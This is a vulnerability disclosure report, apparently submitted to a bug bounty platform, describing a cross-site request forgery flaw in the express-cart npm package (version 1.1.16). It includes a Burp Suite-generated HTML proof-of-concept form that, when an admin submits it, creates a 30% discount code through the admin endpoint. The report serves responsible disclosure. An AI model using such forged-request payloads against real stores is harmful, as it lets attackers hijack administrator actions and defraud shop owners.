> NOTE! Thanks for submitting a report! Please replace all the [square] sections below with the pertinent details. Remember, the more detail you provide, the easier it is for us to triage and respond quickly, so be sure to take your time filling out the report!
I would like to report CSRF in ``express-cart`
It allows attacker cheat admin to do bad behaviors . Main reason is csrf token isnβt used , vulnerability is application wide .
module name: express-cart
version:1.1.16
npm page: https://www.npmjs.com/package/express-cart
> expressCart is a fully functional shopping cart built in Node.js (Express, MongoDB) with Stripe, PayPal, Authorize.net, Adyen and Instore payments.
[1] weekly downloads : 21
> Description about how the vulnerability was found and how it can be exploited, how it harms package users (data modification/lost, system access, other.
> Detailed steps to reproduce with all required references/steps/commands. If there is any exploit code or reference to the package source code this is the place where it should be put.
Create PoC with HTML (generated by burpsuite)
Admin click
discount code
is created
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:1111/admin/settings/discount/create" method="POST">
<input type="hidden" name="code" value="CSRF-CODE-DEMO" />
<input type="hidden" name="type" value="percent" />
<input type="hidden" name="value" value="30" />
<input type="hidden" name="start" value="21/02/2020 14:32" />
<input type="hidden" name="end" value="22/02/2020 14:32" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
> Select Y or N for the following statements:
> Hunterβs comments and funny memes goes here
attacker can do admin privileges